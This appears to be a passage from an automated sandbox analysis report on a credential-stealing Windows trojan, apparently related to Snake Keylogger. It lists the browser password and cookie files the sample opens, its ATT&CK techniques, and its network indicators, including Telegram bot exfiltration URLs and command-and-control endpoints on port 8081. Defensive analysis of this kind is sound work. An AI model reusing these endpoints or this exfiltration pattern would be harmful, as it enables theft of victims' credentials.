            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696494690s
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696494690j
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696494690x
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696494690f
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: C:\Users\user\Desktop\________.exe API call chain: ExitProcess graph end node graph_1-4789
            Source: C:\Users\user\Desktop\________.exe API call chain: ExitProcess graph end node graph_1-4791
            Source: C:\Users\user\Desktop\________.exe Code function: 1_2_00406254 GetModuleHandleA,LoadLibraryA,GetProcAddress, 1_2_00406254
            Source: C:\Users\user\Desktop\________.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\________.exe Memory allocated: page read and write | page guard
            Source: C:\Users\user\Desktop\________.exe Process created: C:\Users\user\Desktop\________.exe "C:\Users\user\Desktop\________.exe"
            Source: C:\Users\user\Desktop\________.exe Queries volume information: C:\Users\user\Desktop\________.exe VolumeInformation
            Source: C:\Users\user\Desktop\________.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\________.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\________.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Users\user\Desktop\________.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\user\Desktop\________.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\Users\user\Desktop\________.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\________.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\________.exe Code function: 1_2_00405F0C GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 1_2_00405F0C
            Source: C:\Users\user\Desktop\________.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match File source: 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: ________.exe PID: 5916, type: MEMORYSTR
            Source: C:\Users\user\Desktop\________.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\Desktop\________.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Users\user\Desktop\________.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\________.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\Desktop\________.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\________.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\________.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
            Source: C:\Users\user\Desktop\________.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\________.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
            Source: C:\Users\user\Desktop\________.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: Yara match File source: 00000003.00000002.3975771250.0000000032E67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: ________.exe PID: 5916, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match File source: 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: ________.exe PID: 5916, type: MEMORYSTR
            ATT&CK matrix, listed per tactic column (leading numbers are the report's count badges, shown as in the original):

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
            Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
            Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
            Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
            Defense Evasion: 11 Masquerading; 1 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 DLL Side-Loading
            Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
            Discovery: 21 Security Software Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; 2 File and Directory Discovery; 215 System Information Discovery; Remote System Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
            Collection: 1 Email Collection; 1 Archive Collected Data; 1 Data from Local System; 1 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture
            Command and Control: 1 Web Service; 21 Encrypted Channel; 1 Non-Standard Port; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 24 Application Layer Protocol; Commonly Used Port
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
            Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
            Source | Detection | Scanner | Label
            ________.exe | 8% | Virustotal |
            ________.exe | 100% | Avira | HEUR/AGEN.1331786

            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Local\Temp\nshD4CB.tmp\System.dll | 0% | ReversingLabs |

            No Antivirus matches

            Source | Detection | Scanner | Label
            foodex.com.pk | 0% | Virustotal |

            Source | Detection | Scanner | Label
            http://mail.foodex.com.pk | 0% | Avira URL Cloud | safe
            https://fa2ytg.dm.files.1drv.com/ | 0% | Avira URL Cloud | safe
            http://foodex.com.pk | 0% | Avira URL Cloud | safe
            https://fa2ytg.dm.files.1drv.com/oft | 0% | Avira URL Cloud | safe
            https://fa2ytg.dm.files.1drv.com/y4m_K24I_IZwtc1os-c0UOoxdtzKrradsOM2iRZNEMhYqB_oUmwpewHC2hedgX3rXjZ | 0% | Avira URL Cloud | safe
            https://fa2ytg.dm.files.1drv.com/y4mMPMXGbTpZA5YgHaTE31Fc-Wg6Iu9gpthjDJlQ5ie3dz395ZMCu5rd38cOpuGMXl4 | 0% | Avira URL Cloud | safe
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            reallyfreegeoip.org | 188.114.96.3 | true | false | | high
            foodex.com.pk | 37.27.123.72 | true | true | | unknown
            api.telegram.org | 149.154.167.220 | true | false | | high
            checkip.dyndns.com | 193.122.130.0 | true | false | | high
            fa2ytg.dm.files.1drv.com | unknown | unknown | true | | unknown
            mail.foodex.com.pk | unknown | unknown | true | | unknown
            api.onedrive.com | unknown | unknown | false | | high
            checkip.dyndns.org | unknown | unknown | false | | high
            Name | Malicious | Antivirus Detection | Reputation
            https://reallyfreegeoip.org/xml/173.254.250.68 | false | | high
            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:141700%0D%0ADate%20and%20Time:%2012/11/2024%20/%2018:46:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20141700%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
            http://checkip.dyndns.org/ | false | | high
            Name | Source | Malicious | Antivirus Detection | Reputation
            https://www.office.com/ | ________.exe, 00000003.00000002.3975771250.0000000032F51000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://duckduckgo.com/chrome_newtab | ________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://reallyfreegeoip.org/xml/173.254.250.68$ | ________.exe, 00000003.00000002.3975771250.0000000032E49000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000003.00000002.3975771250.0000000032DDC000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000003.00000002.3975771250.0000000032E1F000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://duckduckgo.com/ac/?q= | ________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://sectigo.com/CPS0 | ________.exe | false | | high
            http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0# | ________.exe | false | | high
            https://api.telegram.org | ________.exe, 00000003.00000002.3975771250.0000000032E49000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico | ________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://ocsp.sectigo.com0 | ________.exe | false | | high
            https://api.telegram.org/bot | ________.exe, 00000003.00000002.3975771250.0000000032E49000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://mail.foodex.com.pk | ________.exe, 00000003.00000002.3975771250.0000000032E67000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000003.00000002.3975771250.0000000032EFD000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://api.onedrive.com/ | ________.exe, 00000003.00000002.3954718526.00000000025B8000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://www.office.com/lB | ________.exe, 00000003.00000002.3975771250.0000000032F4C000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | ________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://checkip.dyndns.org | ________.exe, 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | ________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://nsis.sf.net/NSIS_ErrorError | ________.exe | false | | high
            https://fa2ytg.dm.files.1drv.com/oft | ________.exe, 00000003.00000003.1735612317.0000000002628000.00000004.00000020.00020000.00000000.sdmp, ________.exe, 00000003.00000003.1735530271.0000000002628000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://api.telegram.org/bot/sendMessage?chat_id=&text= | ________.exe, 00000003.00000002.3975771250.0000000032E49000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://chrome.google.com/webstore?hl=en | ________.exe, 00000003.00000002.3975771250.0000000032F20000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000003.00000002.3975771250.0000000032F51000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://www.ecosia.org/newtab/ | ________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://foodex.com.pk | ________.exe, 00000003.00000002.3975771250.0000000032EFD000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://varders.kozow.com:8081 | ________.exe, 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://aborters.duckdns.org:8081 | ________.exe, 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://ac.ecosia.org/autocomplete?q= | ________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0 | ________.exe | false | | high
            https://fa2ytg.dm.files.1drv.com/ | ________.exe, 00000003.00000003.1709008650.0000000002628000.00000004.00000020.00020000.00000000.sdmp, ________.exe, 00000003.00000003.1735530271.0000000002628000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://www.office.com/8ub | ________.exe, 00000003.00000002.3975771250.0000000032F42000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                                                                high
                                                                                http://51.38.247.67:8081/_send_.php?L________.exe, 00000003.00000002.3975771250.0000000032E67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:141700%0D%0ADate%20a________.exe, 00000003.00000002.3975771250.0000000032E49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://anotherarmy.dns.army:8081________.exe, 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://api.onedrive.com/v1.0/shares/s________.exe, 00000003.00000002.3954718526.00000000025F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z________.exefalse
                                                                                          high
                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://fa2ytg.dm.files.1drv.com/y4mMPMXGbTpZA5YgHaTE31Fc-Wg6Iu9gpthjDJlQ5ie3dz395ZMCu5rd38cOpuGMXl4________.exe, 00000003.00000003.1735612317.0000000002628000.00000004.00000020.00020000.00000000.sdmp, ________.exe, 00000003.00000003.1735530271.0000000002628000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://chrome.google.com/webstore?hl=enlB________.exe, 00000003.00000002.3975771250.0000000032F1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://reallyfreegeoip.org________.exe, 00000003.00000002.3975771250.0000000032E49000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000003.00000002.3975771250.0000000032DAE000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000003.00000002.3975771250.0000000032E1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name________.exe, 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://fa2ytg.dm.files.1drv.com/y4m_K24I_IZwtc1os-c0UOoxdtzKrradsOM2iRZNEMhYqB_oUmwpewHC2hedgX3rXjZ________.exe, 00000003.00000003.1735530271.0000000002628000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#________.exefalse
                                                                                                      high
                                                                                                      https://reallyfreegeoip.org/xml/________.exe, 00000003.00000002.3975771250.0000000032DAE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
188.114.97.3 | unknown | European Union | 13335 | CLOUDFLARENETUS | false
188.114.96.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | false
193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
37.27.123.72 | foodex.com.pk | Iran (ISLAMIC Republic Of) | 39232 | UNINETAZ | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1554160
Start date and time: 2024-11-12 07:35:12 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 28s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ________.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/9@7/5
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 191
• Number of non-executed functions: 126
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 13.107.42.12
• Excluded domains from analysis (whitelisted): odc-dm-files-geo.onedrive.akadns.net, odc-dm-files-brs.onedrive.akadns.net, l-0003.l-msedge.net, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, common.be.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, dm-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, ctldl.windowsupdate.com, odc-commonafdrk-geo.onedrive.akadns.net, odc-commonafdrk-brs.onedrive.akadns.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
01:36:49 | API Interceptor | 8630453x Sleep call for process: ________.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | ALI HASSO - P02515 & P02518.exe | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | Order&picture sample8398398392838PDF.exe | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | https://www.bing.com/ck/a?!&&p=35f7ac11749086c457664a8010a84bc638d369283c719578d3701e6e769d80e3JmltdHM9MTczMDg1MTIwMA&ptn=3&ver=2&hsh=4&fclid=33680f6e-3a94-6c3f-27a6-1a423bb96ddc&psq=site%3Ahttps%3A%2F%2FChiefOfStaff.site&u=a1aHR0cHM6Ly93d3cuY2hpZWZvZnN0YWZmLnNpdGUvd2hhdC1hcmUtdGhlLWtleS1wcmluY2lwbGVzLW9mLW9wZXJhdGlvbnMtbWFuYWdlbWVudA#taehwan.lee@hdel.co.kr | malicious | Outlook Phishing, HTMLPhisher |
149.154.167.220 | 1731350144bd4661a80b2f6df430a3ec80a1cea4bfcea08062cabca8156532cd5eb6ec3f57216.dat-decoded.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | Factura Honorarios 2024-11-04.exe | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | CERTIFICADO TITULARIDAD.exe | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | Quotation.exe | malicious | MassLogger RAT, PureLog Stealer |
149.154.167.220 | BYi52hdbpP.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | Request for Quotation MK FMHS.RFQ.24.11.07.bat.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | ungziped_file.exe | malicious | Snake Keylogger, VIP Keylogger |
188.114.97.3 | 8dPlV2lT8o.exe | malicious | Simda Stealer | qegyhig.com/login.php
188.114.97.3 | 7ObLFE2iMK.exe | malicious | Simda Stealer | lysyvan.com/login.php
188.114.97.3 | UMwpXhA46R.exe | malicious | Simda Stealer | lysyvan.com/login.php
188.114.97.3 | 1fWgBXPgiT.exe | malicious | Simda Stealer | lysyvan.com/login.php
188.114.97.3 | Z8eHwAvqAh.exe | malicious | Simda Stealer | lysyvan.com/login.php
188.114.97.3 | WlCVLbzNph.exe | malicious | Simda Stealer | lysyvan.com/login.php
188.114.97.3 | Bpfz752pYZ.exe | malicious | Simda Stealer | qegyhig.com/login.php
188.114.97.3 | 7DAKMhINGk.exe | malicious | Simda Stealer | qegyhig.com/login.php
188.114.97.3 | Scan112024.vbs | malicious | Snake Keylogger, VIP Keylogger | paste.ee/d/E2K3h
188.114.97.3 | fHkdf4WB7zhMcqP.exe | malicious | FormBook | www.figa1digital.services/zjtq/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
reallyfreegeoip.org | Order&picture sample8398398392838PDF.exe | malicious | GuLoader, Snake Keylogger | 188.114.97.3
reallyfreegeoip.org | HALKBANK.pdf.exe | malicious | Snake Keylogger | 188.114.96.3
reallyfreegeoip.org | 1731350144bd4661a80b2f6df430a3ec80a1cea4bfcea08062cabca8156532cd5eb6ec3f57216.dat-decoded.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
reallyfreegeoip.org | Curriculum Vitae Estrella Torres.exe | malicious | Snake Keylogger | 188.114.97.3
reallyfreegeoip.org | Factura Honorarios 2024-11-04.exe | malicious | GuLoader, Snake Keylogger | 188.114.97.3
reallyfreegeoip.org | CERTIFICADO TITULARIDAD.exe | malicious | GuLoader, Snake Keylogger | 188.114.96.3
reallyfreegeoip.org | CkHXjQGPA5.exe | malicious | Snake Keylogger | 188.114.96.3
reallyfreegeoip.org | QNiXvaE3ps.exe | malicious | Snake Keylogger | 188.114.96.3
reallyfreegeoip.org | N8Sriy2UsP.exe | malicious | Snake Keylogger | 188.114.96.3
reallyfreegeoip.org | Ref#130709.vbe | malicious | MassLogger RAT | 188.114.97.3
checkip.dyndns.com | ALI HASSO - P02515 & P02518.exe | malicious | GuLoader, Snake Keylogger | 132.226.8.169
checkip.dyndns.com | Order&picture sample8398398392838PDF.exe | malicious | GuLoader, Snake Keylogger | 132.226.247.73
checkip.dyndns.com | HALKBANK.pdf.exe | malicious | Snake Keylogger | 193.122.130.0
checkip.dyndns.com | 1731350144bd4661a80b2f6df430a3ec80a1cea4bfcea08062cabca8156532cd5eb6ec3f57216.dat-decoded.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
checkip.dyndns.com | Curriculum Vitae Estrella Torres.exe | malicious | Snake Keylogger | 158.101.44.242
checkip.dyndns.com | Factura Honorarios 2024-11-04.exe | malicious | GuLoader, Snake Keylogger | 193.122.130.0
checkip.dyndns.com | CERTIFICADO TITULARIDAD.exe | malicious | GuLoader, Snake Keylogger | 132.226.8.169
checkip.dyndns.com | CkHXjQGPA5.exe | malicious | Snake Keylogger | 193.122.6.168
checkip.dyndns.com | QNiXvaE3ps.exe | malicious | Snake Keylogger | 158.101.44.242
checkip.dyndns.com | N8Sriy2UsP.exe | malicious | Snake Keylogger | 132.226.247.73
api.telegram.org | Order&picture sample8398398392838PDF.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | https://www.bing.com/ck/a?!&&p=35f7ac11749086c457664a8010a84bc638d369283c719578d3701e6e769d80e3JmltdHM9MTczMDg1MTIwMA&ptn=3&ver=2&hsh=4&fclid=33680f6e-3a94-6c3f-27a6-1a423bb96ddc&psq=site%3Ahttps%3A%2F%2FChiefOfStaff.site&u=a1aHR0cHM6Ly93d3cuY2hpZWZvZnN0YWZmLnNpdGUvd2hhdC1hcmUtdGhlLWtleS1wcmluY2lwbGVzLW9mLW9wZXJhdGlvbnMtbWFuYWdlbWVudA#taehwan.lee@hdel.co.kr | malicious | Outlook Phishing, HTMLPhisher | 149.154.167.220
api.telegram.org | 1731350144bd4661a80b2f6df430a3ec80a1cea4bfcea08062cabca8156532cd5eb6ec3f57216.dat-decoded.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | Factura Honorarios 2024-11-04.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | CERTIFICADO TITULARIDAD.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | Quotation.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
api.telegram.org | BYi52hdbpP.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | Request for Quotation MK FMHS.RFQ.24.11.07.bat.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | ungziped_file.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | Scan112024.vbs | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Match: TELEGRAMRU
Associated Sample Name / URL | Detection | Threat Name | Context
ALI HASSO - P02515 & P02518.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
Order&picture sample8398398392838PDF.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
https://www.bing.com/ck/a?!&&p=35f7ac11749086c457664a8010a84bc638d369283c719578d3701e6e769d80e3JmltdHM9MTczMDg1MTIwMA&ptn=3&ver=2&hsh=4&fclid=33680f6e-3a94-6c3f-27a6-1a423bb96ddc&psq=site%3Ahttps%3A%2F%2FChiefOfStaff.site&u=a1aHR0cHM6Ly93d3cuY2hpZWZvZnN0YWZmLnNpdGUvd2hhdC1hcmUtdGhlLWtleS1wcmluY2lwbGVzLW9mLW9wZXJhdGlvbnMtbWFuYWdlbWVudA#taehwan.lee@hdel.co.kr | malicious | Outlook Phishing, HTMLPhisher | 149.154.167.220
1731350144bd4661a80b2f6df430a3ec80a1cea4bfcea08062cabca8156532cd5eb6ec3f57216.dat-decoded.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Factura Honorarios 2024-11-04.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
CERTIFICADO TITULARIDAD.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
Quotation.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
BYi52hdbpP.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
